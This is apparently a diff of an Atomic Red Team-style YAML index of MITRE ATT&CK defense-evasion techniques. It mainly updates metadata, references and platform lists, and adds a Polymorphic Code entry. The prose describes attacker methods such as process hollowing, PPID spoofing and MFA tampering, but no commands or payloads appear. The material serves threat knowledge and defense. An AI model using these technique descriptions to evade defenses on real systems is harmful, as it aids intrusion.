         the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -8736,7 +8838,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests: []
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests: []
   T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests:
     - name: AWS - GuardDuty Suspension or Deletion
@@ -9365,7 +9457,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9400,8 +9492,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -9467,7 +9557,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -9493,7 +9582,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9518,11 +9607,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9539,7 +9627,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -9549,7 +9636,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9558,19 +9645,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -9618,11 +9703,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -9690,18 +9776,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1564.009:
@@ -9748,7 +9833,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -9770,7 +9855,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -9845,6 +9929,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -9904,12 +9989,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9938,24 +10022,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -9990,9 +10076,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -10015,7 +10098,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -10033,8 +10116,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -10073,7 +10154,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10116,10 +10197,78 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests: []
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -10163,7 +10312,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10188,8 +10337,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1599:
@@ -10220,7 +10367,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -10239,7 +10386,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -10334,11 +10480,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10418,11 +10563,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10487,12 +10631,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests: []
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10541,8 +10684,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -10557,14 +10700,13 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests: []
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10576,7 +10718,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -10606,13 +10748,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
